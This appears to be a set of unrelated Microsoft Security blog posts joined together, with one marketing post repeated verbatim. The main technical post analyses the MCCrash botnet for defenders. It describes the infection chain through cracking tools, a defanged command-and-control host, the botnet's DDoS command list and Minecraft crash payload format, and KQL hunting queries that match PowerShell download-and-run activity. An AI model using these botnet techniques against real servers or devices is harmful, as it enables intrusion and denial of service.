We’re excited to announce that Microsoft is named a Leader in The Forrester Wave: Security Analytics Platforms, Q4 2022. Microsoft achieved the highest possible score in 17 different criteria, including partner ecosystem, innovation roadmap, product security, case management, and architecture.
With threats like ransomware increasing in volume and complexity, it’s never been more important for chief information security officers (CISOs) to invest in solutions that will keep their companies safe and running. As the threat landscape continues to proliferate, cloud-native security information and event management (SIEM) solutions like Microsoft Sentinel have become a central part of a SecOps solution and have evolved to meet the new needs of customers to move faster.
We believe this placement validates our continued investment in Microsoft Sentinel, security research, and threat intelligence. We take it as a vote of confidence in our ability to keep our customers safe and working fearlessly. Microsoft Security is named a leader on seven different Forrester Wave reports and continues to invest in innovative solutions that work together to keep our customers’ businesses safer.
Microsoft was evaluated on several capabilities that empower customers to move faster to identify, investigate, and remediate threats. Some particularly important features include:
Providing flexibility to customers to create their own rules using Kusto Query Language (KQL) or by bringing their own machine learning. This allows security operations center (SOC) teams to build automations that work for their organization and reduces the amount of time spent on repetitive tasks.
Comprehensive threat intelligence that empowers customers to keep up with the evolving threat landscape.
Scaled search and storage of large volumes of data allow customers to protect their digital ecosystems at scale and monitor all their clouds, platforms, and endpoints in one place.
The Microsoft Sentinel strategy
Microsoft Sentinel is a next-generation SIEM solution that collects security data across multicloud, multi-platform data sources. The comprehensive SOC platform provides user entity and behavior analytics (UEBA), threat intelligence, and security orchestration, automation, and response (SOAR) capabilities, along with deep integrations into Microsoft Defender threat protection products’ comprehensive coverage across SIEM and extended detection and response (XDR). Sentinel empowers companies to leverage cloud-scale, innovative AI and automation to move at machine speed and stay ahead of evolving threats.
What makes the Microsoft suite of security solutions unique is the native integrations of SIEM with XDR to provide quick setup, more comprehensive coverage and context, and faster response time. Customers who leverage Microsoft Defender XDR products may be eligible for discounts on Microsoft Sentinel data ingestion.
Over the past year, Microsoft has invested in many new capabilities, including content for Internet of Things (IoT) devices, business application coverage including SAP, enhanced SOAR capabilities, and improved workflow management. These capabilities help our customers to protect more of their digital ecosystem, automate responses to more types of threats, and build an efficient and collaborative SOC.
What’s next in Microsoft Security
Microsoft is dedicated to continued leadership in security. Continued investments will provide customers with the intelligence, automation, and scalability they need to protect their businesses and work efficiently. Upcoming enhancements include the integration of more threat intelligence, new ways to hunt across large sets of data, and more context and prioritization guidance in alerts. New AI solutions will allow SecOps teams to more easily identify the most urgent issues and give guidance on how similar customers have reacted to similar incidents. The Microsoft vision is to provide a central platform for SOCs to understand the health of their entire business and quickly act on issues.
Microsoft Security is committed to empowering SecOps teams with security tools and platforms that enable the critical protection your users rely on. To experience Microsoft Sentinel at your organization, get started with a free trial today.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
Malware operations continue to rapidly evolve as threat actors add new capabilities to existing botnets, increasingly targeting and recruiting new types of devices. Attackers update malware to target additional operating systems, ranging from PCs to IoT devices, growing their infrastructure rapidly. The Microsoft Defender for IoT research team recently analyzed a cross-platform botnet that originates from malicious software downloads on Windows devices and succeeds in propagating to a variety of Linux-based devices.
The botnet spreads by enumerating default credentials on internet-exposed Secure Shell (SSH)-enabled devices. Because IoT devices are commonly enabled for remote configuration with potentially insecure settings, these devices could be at risk to attacks like this botnet. The botnet’s spreading mechanism makes it a unique threat, because while the malware can be removed from the infected source PC, it could persist on unmanaged IoT devices in the network and continue to operate as part of the botnet.
Microsoft tracks this cluster of activity as DEV-1028, a cross-platform botnet that infects Windows devices, Linux devices, and IoT devices. The DEV-1028 botnet is known to launch distributed denial of service (DDoS) attacks against private Minecraft servers.
Our analysis of the DDoS botnet revealed functionalities specifically designed to target private Minecraft Java servers using crafted packets, most likely as a service sold on forums or darknet sites. A breakdown of the systems affected by the botnet over the three months from the time of this analysis also revealed that most of the devices were in Russia:
Figure 1. IP distribution of devices infected by the botnet
This type of threat stresses the importance of ensuring that organizations manage, keep up to date, and monitor not just traditional endpoints but also IoT devices that are often less secure. In this blog post, we share details on how this botnet affects multiple platforms, its DDoS capabilities, and recommendations for organizations to prevent their devices from becoming part of a botnet. We also share Minecraft server version information for owners of private servers to update and ensure they are protected from this threat.
Cross-platform botnet targets SSH-enabled devices
Microsoft researchers observed that the initial infection points related to the botnet were devices infected through the installation of malicious cracking tools that purport to acquire illegal Windows licenses.
Figure 2. Cracking tools used to spread the botnet.
The cracking tools contain additional code that downloads and launches a fake version of svchost.exe through a PowerShell command. In some cases, the downloaded file is named svchosts.exe.
Figure 3. The code of the .NET executable that downloads and runs svchost.exe
Next, svchost.exe launches malicious.py, the main Python script that contains all the logic of the botnet, whichthen scans the internet for SSH-enabled Linux-based devices (Debian, Ubuntu, CentOS, and IoT workloads such as Raspbian, which are commonly enabled for remote configuration) and launches a dictionary attack to propagate. Once a device is found, it downloads the file Updater.zip from repo[.]ark—event[.]net onto the device, which creates the file fuse. The fuse file then downloads a copy of malicious.py onto the device. Both svchost.exe and fuse are compiled using PyInstaller, which bundles all the Python runtime and libraries necessary to initiate malicious.py.
Figure 4. The DDoS botnet attack flow
While malicious.py has specific functionalities depending on whether the file launches on a Windows or Linux-based device (for Windows, the file establishes persistency by adding the registry key Software\Microsoft\Windows\CurrentVersion\Run with the executable as the value), the executable is compiled to operate on both Windows and Linux-based devices. The file communicates with its command-and-control (C2) server to launch the following commands:
Establish TCP connection to repo[.]ark-event[.]net on port 4676.
Send initial connection string.
Receive a key from the server for encryption and decryption, and then encrypt further communication using the Fernet symmetric algorithm.
Send version information to the server:
Windows device: The current Windows version
Linux device: Hardcoded version (2.19 in the sample we analyzed)
Continue receiving encrypted commands from the server
Based on our analysis, the botnet is primarily used to launch DDoS attacks against private Minecraft servers using known server DDoS commands and unique Minecraft commands. Below is the list of commands established in the code:
Command
Description
SYNC
Check that malware is running
PROXY_<url>
Set proxy servers
DOWNLOAD_<url>
Download file
EXEC_<command >
Run specific command line
SCANNER[ON|OFF]
Default credentials attack on SSH servers to spread
ATTACK_TCP
Send random TCP payloads
ATTACK_[HOLD|HANDSHAKE]
Send random TCP payloads through proxy
ATTACK_UDP
Send random UDP payload
ATTACK_VSE
Attack on Valve Source Engine protocol
ATTACK_RAKNET
Attack on RakNet protocol (used by Minecraft servers)
ATTACK_NETTY
Minecraft – Login handshake Packet
ATTACK_[MCBOT|MINE]
Minecraft – Login Start Packet
ATTACK_[MCPING|PING]
Minecraft – Login Success Packet
ATTACK_MCDATA
Minecraft – Login Handshake, Login Start and Close Window Packets
ATTACK_MCCRASH
Minecraft – Login Handshake and Login Start packets, using Username with env variable
ATTACK_JUNK
Send Tab-Complete packet
ATTACK_HTTP-GET
Send GET request
ATTACK_HTTP-FAST
Send HEAD request
STOP_ATTACK
Stop the previous attack
While most of the commands are methods of DDoS, the most notable command run by the botnet is ATTACK_MCCRASH. The command sends ${env:random payload of specific size:-a} as the username in order to exhaust the resources of the server and make it crash.
Figure 5. MCCrash TCP payload seen in a packet capture
TCP payloads on port 25565 have the following binary structure:
Bytes [0:1] – Size of packet
Bytes [1:2] – Login Start command
Bytes [2:3] – Size of username
Bytes [3:18] – Username string
The usage of the env variable triggers the use of Log4j 2 library, which causes abnormal consumption of system resources (not related to Log4Shell vulnerability), demonstrating a specific and highly efficient DDoS method.
A wide range of Minecraft server versions could be affected
While testing the impact of the malware, researchers found that the malware itself was hardcoded to target a specific version of Minecraft server, 1.12.2. However, all versions between 1.7.2 and 1.18.2 can be affected by this method of attack. There is a slight modification in the Minecraft protocol in server version 1.19, which was released earlier in 2022, that prevents the use of the Minecraft specific commands, the ATTACK_MCCRASH, ATTACK_[MCBOT|MINE] and ATTACK_MCDATA, without modification of the attack code.
Figure 6. Distribution of Minecraft servers by versionFigure 7. Distribution of Minecraft servers that could be affected by MCCrash
The wide range of at-risk Minecraft servers highlights the impact this malware could have had if it was specifically coded to affect versions beyond 1.12.2. The unique ability of this threat to utilize IoT devices that are often not monitored as part of the botnet substantially increases its impact and reduces its chances of being detected.
Protecting endpoints from cross-platform DDoS botnets like MCCrash
To harden devices networks against threats like MCCrash, organizations must implement the basics to secure identities and their devices, including access limitation. Solutions must detect downloads of malicious programs and malicious attempts to gain access to SSH-enabled devices and generate alerts on anomalous network behavior. Below are some of our recommendations for organizations:
Ensure employees are not downloading cracking tools as these are abused as an infection source for spreading malware.
Increase network security by enforcing multi-factor authentication (MFA) methods such as Azure Active Directory (now part of Microsoft Entra) MFA. Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
Microsoft 365 Defender protects against attacks related to botnets by coordinating threat data across identities, endpoints, cloud apps, email, and documents. Such cross-domain visibility allows Microsoft 365 Defender to comprehensively detect and remediate end-to-end attack chains—from malicious downloads to its follow-on activities in endpoints. This rich set of tools like advanced hunting let defenders surface threats and gain insights for hardening networks from compromise.
Adopt a comprehensive IoT security solution such as Microsoft Defender for IoT to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender. Defender for IoT is updated regularly with indicators of compromise (IoCs) from threat research like the example described in this blog, alongside rules to detect malicious activity.
On the IoT device level:
Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.
Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.
Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.
For users hosting private Minecraft servers, update to version 1.19.1 and above.
Adopt a comprehensive Windows security solution
Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.
For commercial customers, enable application and browser controls such as Microsoft Defender Application Guard for enhanced protection for Office and Edge.
Perform timely cleanup of all unused and stale executables sitting on your organizations’ devices.
Protect against advanced firmware attacks by enabling memory integrity, Secure Boot, and Trusted Platform Module 2.0, if not enabled by default, which hardens boot using capabilities built into modern CPUs.
Microsoft Defender Antivirus detects the malware used in this attack as the following:
TrojanDownloader:MSIL/MCCrash.NZM!MTB
Trojan:Win32/MCCrash.MA!MTB
TrojanDownloader:Python/MCCrash!MTB
Trojan:Python/MCCrash.A
TrojanDownloader:Linux/MCCrash!MTB
Trojan:Python/MCCrash.RPB!MTB
Trojan:Python/MCCrash.RPC!MTB
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:
Emerging threat activity group DEV-1028 detected
System file masquerade
Anomaly detected in ASEP registry
Suspicious process launched using cmd.exe
Suspicious file launch
Microsoft Defender for IoT
MCCrash-related activity on IoT devices would raise the following alerts in Microsoft Defender for IoT:
Unauthorized SSH access
Excessive login attempts
Microsoft Defender for Cloud
Microsoft Defender for Cloud raises the following alert for related activity:
VM_SuspectDownload
Advanced hunting queries
Run the following queries to search for related files in your environment:
DeviceFileEvents
| where SHA256 in ("e3361727564b14f5ee19c40f4e8714fab847f41d9782b157ea49cc3963514c25","143614d31bdafc026827e8500bdc254fc1e5d877cb96764bb1bd03afa2de2320","f9c7dd489dd56e10c4e003e38428fe06097aca743cc878c09bf2bda235c73e30","4e65ec5dee182070e7b59db5bb414e73fe87fd181b3fc95f28fe964bc84d2f1f","eb57788fd2451b90d943a6a796ac5e79f0faf7151a62c1d07b744a351dcfa382","93738314c07ea370434ac30dad6569c59a9307d8bbde0e6df9be9e2a7438a251","202ac3d32871cb3bf91b7c49067bfc935fbc7f0499d357efead1e9f7f5fcb9d1")
DeviceFileEvents
| where FolderPath endswith @":\windows\svchost.exe"
DeviceRegistryEvents
| where RegistryKey contains "CurrentVersion\\Run"
| where RegistryValueName == "br" or RegistryValueData contains "svchost.exe" or RegistryValueData contains "svchosts.exe"
DeviceProcessEvents
| where FileName in~ ("cmd.exe", "powershell.exe")
| where ProcessCommandLine has_all ("-command", ".downloadfile(", "windows/svchost.exe")
David Atch, Maayan Shaul, Mae Dotan, Yuval Gordon, Microsoft Defender for IoT Research Team
Ross Bevington, Microsoft Threat Intelligence Center (MSTIC)
Relentless bad actors, evolving attack tactics, and numerous surfaces and endpoints that attackers may try to exploit. With the average cost of a data breach reaching an all-time high of USD4.35 million in 2022,1 protecting your people and data from adversaries is more important than ever. Plus, juggling multiple cybersecurity technologies can exacerbate the stress further. But while modern threats are increasingly complex, your security solution doesn’t have to be.
Microsoft Security solutions help you eliminate gaps and gain the simplified, comprehensive protection and expertise you need to innovate and grow in a changing world. You gain the capabilities to match the pace of adversaries, who develop and deploy threats at a frenzied pace hoping to exploit basic trust or human error. A panicked and tumultuous response isn’t the answer. Instead, Microsoft Security brings you a comprehensive solution across clouds and platforms and helps you do more with less by enabling you to be more efficient, effective, and unified.
But what do we mean when we say do more with less? We mean easing IT departments’ workload with technology that delivers a deliberate and effective security response. We mean increasing efficiencies and adapting to unexpected events quickly—everything from the pandemic to economic uncertainty. We mean managing the security of your business with fewer resources. And we mean giving back time so that security professionals can focus on the most important things.
Doing more with less is about a change in mindset and it doesn’t have to mean sacrifice. To further explain how this works in the real world, let’s explore three strategies of the do more with less approach and consider success stories from customers that have benefitted from each approach.
1. Simplify vendor management
When you hear do more with less, simplicity is likely one of the first attributes that come to mind. Protecting what’s most important to your organization is critical. However, juggling multiple technology vendors adds unwelcome complexity. Our research shows that large organizations have an average of 75 security solutions. Managing multiple vendors can be burdensome for IT while valuable security insights sit siloed in separate dashboards. And siloed solutions can result in fragmented visibility and can be exploited.
Several features of Microsoft Security support simplified vendor management. By choosing Microsoft Security as your comprehensive security solution, you can eliminate redundant capabilities, and consolidate the number of vendor contracts you manage. You can avoid the challenges of managing multiple vendors, each with its own contracts and licenses. Paring down the number of disparate security solutions can even help you realize up to 60 percent cost savings when you use our security, compliance, and identity solutions in Microsoft 365 E3 and Microsoft 365 E5.2
One Microsoft customer that has realized the value of simplified vendor management is Rabobank, a financial institution based in the Netherlands, which uses Microsoft 365 E3 and Microsoft 365 E5. The firm decreased its security vendors from more than 20 to 4, with Microsoft as its main vendor. The company was able to save €400,000 alone by switching to Microsoft Defender for Cloud for cloud threat and vulnerability management functionality. Microsoft Security has replaced multiple security information and event management systems (SIEMs).
“Our engineering team previously spent most of its time working to keep everything up and running and trying to integrate all those systems,” said Raoul van der Voort, Global Service Owner, Cyber Defense Center, Rabobank. “It’s difficult to ensure that we have full insights from a security perspective when our platforms are so varied. We wanted protection and visibility everywhere. That’s why we use Defender for Cloud—it gives us single pane of glass visibility across our hybrid and multicloud environment.“
Up to 60 percent in savings from simplifying your vendor approach
Our 60 percent savings calculation is an estimate based on the cost and complexity of buying point solutions from multiple vendors for cybersecurity coverage. Available estimated pricing indicates it would cost a company about USD63 per user per month for a representative basket of solutions covering typical security, compliance, identity, management, and privacy needs.
However, by adding E5 advanced compliance and security to Microsoft 365 E3 core security and compliance, these same companies can reduce their costs to approximately USD24 per user per month, based on web direct prices for Microsoft offerings. This represents savings of up to 60 percent. That also means fewer vendors to manage, more efficient operations, and reduced costs and the risk of cyberthreats. All of these benefits can result from helping organizations do more with less.
Figure 1:Potential cost savings of up to 60 percent when consolidating security solutions by using Microsoft 365 E5 Compliance and Security add-ons to a Microsoft 365 E3 license—instead of using multiple-point solutions. Savings are based on publicly available estimated pricing for other vendor solutions and web direct/based price shown for Microsoft offerings. Price is not guaranteed and subject to change.
2. Reduce threats with AI and automation
With threats stretching IT teams to the limit—and talent gaps making it difficult to fill open roles—people can use a boost. AI, machine learning, and automation help humans protect sensitive data, detect and respond faster to threats, and more accurately predict future attacks and insider risks.
AI and automation tools also help you more easily manage and govern on-premises multicloud and software-as-a-service (SaaS) data. Improve compliance, monitor and remediate potentially risky activity, and safely enable productive work for employees using multiple devices in multiple locations.
Organizations are also using AI and machine learning to:
Filter events and make connections between incidents.
Focus the IT team’s threat investigation on the biggest security issues.
Disrupt ransomware attacks, which traditionally are “discovered” when receiving a ransomware note.
Consumer goods giant Land O’Lakes, Inc., must navigate cybersecurity challenges in an environment that includes 9,000 employees, nearly 10,000 endpoints, a significant on-premises infrastructure, Google Cloud Platform, and Amazon Web Services clouds, in addition to its main cloud platform, Microsoft Azure. That results in a lot to track. The company, which is headquartered in the United States, uses security and compliance solutions in Microsoft 365 E5 to have visibility into its threat landscape. It also leverages built-in AI and machine learning in Microsoft Sentinel and Microsoft Defender for Cloud to proactively manage threats and reduce alert fatigue.
“The Microsoft tools we use are native to the platform,” said Michael Marsh, Senior Security Engineer, Land O’Lakes. “Microsoft combines a tremendous volume of telemetry from around the world, which helps us understand where we need to direct our attention so that we can protect Lake O’Lakes.“
3. Improve operational efficiency
Increasing SecOps efficiency saves considerable time. Unified SIEM and extended detection and response (XDR) improve visibility across identities and endpoints. A deeply integrated solution from Microsoft Security makes it easier to protect your identities, devices, apps, and data against breaches.
United Kingdom sporting goods retailer Frasers Group realized that adding iconic new brands required a flexible, interoperable tool set. It found what it needed with a Microsoft SIEM and XDR solution as well as Microsoft Sentinel for a single view into security threats and alerts and Microsoft 365 Defender for tailored protection.
“The XDR capabilities Microsoft offers are second to none. Microsoft Sentinel layers built-in SOC capabilities with playbooks functionality,” said Matthew Wilmot, Group Head of Enterprise Security, Frasers Group. “The automation it provides is key to keeping our SOC team lean. Without it, we would need to triple our team.”
Security for all
Comprehensive security means adopting an end-to-end approach that harnesses the power of AI to protect against internal and external cyberthreats and secure multicloud environments. Protect your organization, people, and data for a more secure future and satisfy increasingly intricate compliance regulations. People are arguably the most important piece of this. When protected, they are free to focus on what matters most.
Explore Microsoft Security to learn how our solutions can help give everyone in your organization peace of mind and how embracing a do more with less approach to security can help make you more efficient, effective, and unified.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
2Savings based on publicly available estimated pricing for other vendor solutions and web direct/based price shown for Microsoft offerings. Price is not guaranteed and subject to change.
Relentless bad actors, evolving attack tactics, and numerous surfaces and endpoints that attackers may try to exploit. With the average cost of a data breach reaching an all-time high of USD4.35 million in 2022,1 protecting your people and data from adversaries is more important than ever. Plus, juggling multiple cybersecurity technologies can exacerbate the stress further. But while modern threats are increasingly complex, your security solution doesn’t have to be.
Microsoft Security solutions help you eliminate gaps and gain the simplified, comprehensive protection and expertise you need to innovate and grow in a changing world. You gain the capabilities to match the pace of adversaries, who develop and deploy threats at a frenzied pace hoping to exploit basic trust or human error. A panicked and tumultuous response isn’t the answer. Instead, Microsoft Security brings you a comprehensive solution across clouds and platforms and helps you do more with less by enabling you to be more efficient, effective, and unified.
But what do we mean when we say do more with less? We mean easing IT departments’ workload with technology that delivers a deliberate and effective security response. We mean increasing efficiencies and adapting to unexpected events quickly—everything from the pandemic to economic uncertainty. We mean managing the security of your business with fewer resources. And we mean giving back time so that security professionals can focus on the most important things.
Doing more with less is about a change in mindset and it doesn’t have to mean sacrifice. To further explain how this works in the real world, let’s explore three strategies of the do more with less approach and consider success stories from customers that have benefitted from each approach.
1. Simplify vendor management
When you hear do more with less, simplicity is likely one of the first attributes that come to mind. Protecting what’s most important to your organization is critical. However, juggling multiple technology vendors adds unwelcome complexity. Our research shows that large organizations have an average of 75 security solutions. Managing multiple vendors can be burdensome for IT while valuable security insights sit siloed in separate dashboards. And siloed solutions can result in fragmented visibility and can be exploited.
Several features of Microsoft Security support simplified vendor management. By choosing Microsoft Security as your comprehensive security solution, you can eliminate redundant capabilities, and consolidate the number of vendor contracts you manage. You can avoid the challenges of managing multiple vendors, each with its own contracts and licenses. Paring down the number of disparate security solutions can even help you realize up to 60 percent cost savings when you use our security, compliance, and identity solutions in Microsoft 365 E3 and Microsoft 365 E5.2
One Microsoft customer that has realized the value of simplified vendor management is Rabobank, a financial institution based in the Netherlands, which uses Microsoft 365 E3 and Microsoft 365 E5. The firm decreased its security vendors from more than 20 to 4, with Microsoft as its main vendor. The company was able to save €400,000 alone by switching to Microsoft Defender for Cloud for cloud threat and vulnerability management functionality. Microsoft Security has replaced multiple security information and event management systems (SIEMs).
“Our engineering team previously spent most of its time working to keep everything up and running and trying to integrate all those systems,” said Raoul van der Voort, Global Service Owner, Cyber Defense Center, Rabobank. “It’s difficult to ensure that we have full insights from a security perspective when our platforms are so varied. We wanted protection and visibility everywhere. That’s why we use Defender for Cloud—it gives us single pane of glass visibility across our hybrid and multicloud environment.“
Up to 60 percent in savings from simplifying your vendor approach
Our 60 percent savings calculation is an estimate based on the cost and complexity of buying point solutions from multiple vendors for cybersecurity coverage. Available estimated pricing indicates it would cost a company about USD63 per user per month for a representative basket of solutions covering typical security, compliance, identity, management, and privacy needs.
However, by adding E5 advanced compliance and security to Microsoft 365 E3 core security and compliance, these same companies can reduce their costs to approximately USD24 per user per month, based on web direct prices for Microsoft offerings. This represents savings of up to 60 percent. That also means fewer vendors to manage, more efficient operations, and reduced costs and the risk of cyberthreats. All of these benefits can result from helping organizations do more with less.
Figure 1:Potential cost savings of up to 60 percent when consolidating security solutions by using Microsoft 365 E5 Compliance and Security add-ons to a Microsoft 365 E3 license—instead of using multiple-point solutions. Savings are based on publicly available estimated pricing for other vendor solutions and web direct/based price shown for Microsoft offerings. Price is not guaranteed and subject to change.
2. Reduce threats with AI and automation
With threats stretching IT teams to the limit—and talent gaps making it difficult to fill open roles—people can use a boost. AI, machine learning, and automation help humans protect sensitive data, detect and respond faster to threats, and more accurately predict future attacks and insider risks.
AI and automation tools also help you more easily manage and govern on-premises multicloud and software-as-a-service (SaaS) data. Improve compliance, monitor and remediate potentially risky activity, and safely enable productive work for employees using multiple devices in multiple locations.
Organizations are also using AI and machine learning to:
Filter events and make connections between incidents.
Focus the IT team’s threat investigation on the biggest security issues.
Disrupt ransomware attacks, which traditionally are “discovered” when receiving a ransomware note.
Consumer goods giant Land O’Lakes, Inc., must navigate cybersecurity challenges in an environment that includes 9,000 employees, nearly 10,000 endpoints, a significant on-premises infrastructure, Google Cloud Platform, and Amazon Web Services clouds, in addition to its main cloud platform, Microsoft Azure. That results in a lot to track. The company, which is headquartered in the United States, uses security and compliance solutions in Microsoft 365 E5 to have visibility into its threat landscape. It also leverages built-in AI and machine learning in Microsoft Sentinel and Microsoft Defender for Cloud to proactively manage threats and reduce alert fatigue.
“The Microsoft tools we use are native to the platform,” said Michael Marsh, Senior Security Engineer, Land O’Lakes. “Microsoft combines a tremendous volume of telemetry from around the world, which helps us understand where we need to direct our attention so that we can protect Lake O’Lakes.“
3. Improve operational efficiency
Increasing SecOps efficiency saves considerable time. Unified SIEM and extended detection and response (XDR) improve visibility across identities and endpoints. A deeply integrated solution from Microsoft Security makes it easier to protect your identities, devices, apps, and data against breaches.
United Kingdom sporting goods retailer Frasers Group realized that adding iconic new brands required a flexible, interoperable tool set. It found what it needed with a Microsoft SIEM and XDR solution as well as Microsoft Sentinel for a single view into security threats and alerts and Microsoft 365 Defender for tailored protection.
“The XDR capabilities Microsoft offers are second to none. Microsoft Sentinel layers built-in SOC capabilities with playbooks functionality,” said Matthew Wilmot, Group Head of Enterprise Security, Frasers Group. “The automation it provides is key to keeping our SOC team lean. Without it, we would need to triple our team.”
Security for all
Comprehensive security means adopting an end-to-end approach that harnesses the power of AI to protect against internal and external cyberthreats and secure multicloud environments. Protect your organization, people, and data for a more secure future and satisfy increasingly intricate compliance regulations. People are arguably the most important piece of this. When protected, they are free to focus on what matters most.
Explore Microsoft Security to learn how our solutions can help give everyone in your organization peace of mind and how embracing a do more with less approach to security can help make you more efficient, effective, and unified.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
2Savings based on publicly available estimated pricing for other vendor solutions and web direct/based price shown for Microsoft offerings. Price is not guaranteed and subject to change.
Today, the third edition of Cyber Signals was released spotlighting security trends and insights gathered from Microsoft’s 43 trillion daily security signals and 8,500 security experts. In this edition, we share new insights on wider risks that converging IT, Internet of Things (IoT), and operational technology (OT) systems pose to critical infrastructure. Cyber Signals presents new data on these risks with practical recommendations for enterprises.
OT is a combination of hardware and software across programmable systems or devices that interact with the physical environment (or manage devices that interact with the physical environment). Examples of OT can include building management systems, fire control systems, and physical access control mechanisms, like doors and elevators.
With increasing connectivity across converging IT, OT, and IoT increasing, organizations and individuals need to rethink cyber risk impact and consequences. Similar to how the loss of a laptop or modern vehicle containing a homeowner’s cached Wi-Fi credentials could grant a property thief unauthorized network access, compromising a manufacturing facility’s remotely connected equipment or a smart building’s security cameras introduces new vectors for threats like malware or industrial espionage.
With more than 41 billion IoT devices across enterprise and consumer environments expected by 2025—according to International Data Corporation (IDC) research1—devices such as cameras, smart speakers, or locks and commercial appliances can become entry points for attackers.
As OT systems underpinning energy, transportation, and other infrastructures become increasingly connected to IT systems, the risk of disruption and damage grows as boundaries blur between these formerly separated worlds. Microsoft has identified unpatched, high-severity vulnerabilities in 75 percent of the most common industrial controllers in customer OT networks, illustrating how challenging it is for even well-resourced organizations to patch control systems in demanding environments sensitive to downtime.
For businesses and infrastructure operators across industries, the defensive imperatives are gaining total visibility over connected systems and weighing evolving risks and dependencies. Unlike the IT landscape of common operating systems, business applications, and platforms, OT and IoT landscapes are more fragmented, featuring proprietary protocols and devices that may not have cybersecurity standards. Other realities affecting things like patching and vulnerability management are also factors.
While connected OT and IoT-enabled devices offer significant value to organizations looking to modernize workspaces, become more data-driven, and ease demands on staff through shifts like remote management and automation in critical infrastructure networks, if not properly secured, they increase the risk of unauthorized access to operational assets and networks.
David Atch, Microsoft Threat Intelligence, Head IoT and OT Security Research, highlights in this edition’s profile that to address IT and OT threats to critical infrastructure, organizations must have full visibility into the number of IT, OT, and IoT devices in their enterprise, where or how they converge, and the vital data, resources, and utilities accessible across these devices. Without this, organizations face both mass information disclosure (such as leaked production data of a factory) and the potential elevation of privilege for command and control of cyber-physical systems (such as stopping a factory production line). He shares additional insights in the Cyber Signals digital briefing where we take a deeper dive into wider risks that converging IT, IoT, and OT systems pose.
Securing IoT solutions with a Zero Trust security model starts with non-IoT specific requirements—specifically ensuring you have implemented the basics to securing identities and their devices and limiting their access. These requirements include explicitly verifying users, having visibility into the devices on the network, and real-time risk detections.
We hope these resources are helpful in understanding and managing this evolving risk. To learn more about IT, OT, and IoT threats and explore the latest cybersecurity insights and updates visit Security Insider.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
What does it mean to be a multicloud organization? As the name implies, the term describes a model of cloud computing where an organization uses multiple clouds—two or more public clouds, private clouds, or a combination of public, private, and edge clouds—to distribute applications and services. Subscribing to multiple cloud vendors can help your business access best-of-breed solutions along with competitive pricing.
The downside? Using multiple cloud platforms can create inconsistent infrastructures that don’t scale across environments. This can lead to teams working in silos—bringing increased complexity, additional costs, network security gaps, and risks to business-critical applications and data. It’s not unheard of for some organizations to own 80 to 100 different security tools stitched across hybrid and multicloud environments, while still wondering: are we secure? In this blog, we’ll help you answer that question by detailing four qualities a multicloud data-protection solution should provide and how Microsoft Purview can help unify security, compliance, and data protection across your enterprise.
Multiple clouds require unified data protection
Enabling multicloud integration and automation at scale is essential for fostering a robust partner ecosystem. Since 89 percent of enterprise customers have moved to a multicloud environment, maintaining security across your expanding data estate is necessary.1 Patchwork solutions can create vulnerabilities; whereas, a comprehensive solution is able to deliver seamless data protection and data governance across your entire digital estate.
Look for a multicloud security and data-protection solution that:
Unifies auto-discovery and protection of sensitive data. Your multicloud data-protection solution should provide comprehensive security and compliance tools that span both first- and third-party apps and services to include Personally Identifiable Information (PII), such as home addresses, date of birth, and Social Security Numbers. Look for features such as built-in sensitivity labeling within applications and services, including popup user notifications that help guide users on security best practices. These features help ensure all sensitive data is correctly classified and labeled so that files can’t be exfiltrated without proper permissions.
A data-protection solution with rights management and automatic encryption of emails (and attachments), as well as co-authoring of encrypted documents, will help to ensure secure collaboration. Your multicloud security tool should be flexible enough to allow manual labeling of some sensitive files for leadership-only access (like mergers and acquisitions projects), while also enabling admins to automatically label and protect business files stored in Microsoft SharePoint or Microsoft Teams (like Confidential labels for Finance or HR records). This tool should also be able to scan and classify on-premises file shares, as well as cloud applications and services.
Protects sensitive files and documents from being exfiltrated to third-party applicationsand services. More than 40 percent of corporate data is dark.2 Meaning, it’s not classified, protected, or governed. This invites risk in the form of sensitive data leakage, which can harm your reputation and, in the case of leaked PII, lead to costly litigation. Your multicloud security solution should be able to classify files and documents, apply sensitivity labels, provide sharing controls and file governance, and use near real-time data loss prevention policies to prevent data leakage across third-party apps.
Uses automated data discovery across structured and unstructured data. Every organization needs to be able to securely share data both internally and with partners and customers. That’s why your data protection solution needs to provide data scanning and classification for all types of assets across multicloud and on-premises environments. Metadata and descriptions of data assets should be integrated into a holistic map of your data estate. Atop this map, purpose-built apps can create environments for data discovery, access management, and insights about your data landscape.
Applies Zero Trust principles to your entire digital estate. This includes strong multifactor authentication to verify user identities, as well as ensuring all endpoints are in compliance. Your data-protection solution should also ensure that governance and compliance policies are built in, and continuous risk assessment and forensics capabilities are implemented. Other key functions should include classifying, labeling, and encrypting emails and documents, as well as adaptive access to software as a service (SaaS) applications and on-premises applications.
Integrate for comprehensive protection
Overcoming the siloed approach in a multicloud environment can be a challenge. However, the risks are too great to make do with ad-hoc, patchwork security solutions. Beyond PII, also at stake is your business’s intellectual property (IP), financial statements, organizational structures, employee contacts, and other information that could be targeted with ransomware, phishing, and password attacks.
Microsoft Purview’s information protection and governance capabilities help your organization address potential data vulnerabilities across a multicloud environment by integrating information protection and data lifecycle management, along with data loss prevention, insider risk management, and eDiscovery. Microsoft Purview’s data governance portal helps manage your entire data landscape—on-premises, multicloud, and SaaS—allowing you to create a comprehensive, up-to-date map of your data wherever it resides. This unified governance enables data curators and security admins to keep your data secure; all while empowering users to find the trustworthy data they need.
